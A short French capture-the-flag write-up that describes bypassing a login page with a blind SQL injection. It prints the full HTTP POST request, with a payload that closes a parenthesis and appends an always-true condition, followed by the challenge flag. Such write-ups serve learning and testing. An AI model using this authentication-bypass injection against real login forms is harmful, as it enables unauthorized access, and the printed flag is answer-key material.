On trouve une page d'authentification classique, rien de bien méchant.
La première chose qui passe par la tête c'est une Injection SQL blind qui permettrait de se connecter sans mot de passe. C'est évidemment la bonne solution. On a juste galéré à comprendre qu'il fallait en fait fermer une parenthèse pour exploiter correctement la faille.
POST /action.php HTTP/1.1 Host: 54.247.160.116:8008 User-Agent: Firefox/13.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=vhks5uigf3faen5m106125r1j1 Content-Type: application/x-www-form-urlencoded Content-Length: 86 login=suce") OR 1=1 -- -&mdp=suce&token=851300ee84c2b80ed40f51ed26d866fc&cnx=Connexion
Flag : df2f49e1360980b107c376fd2fe245e8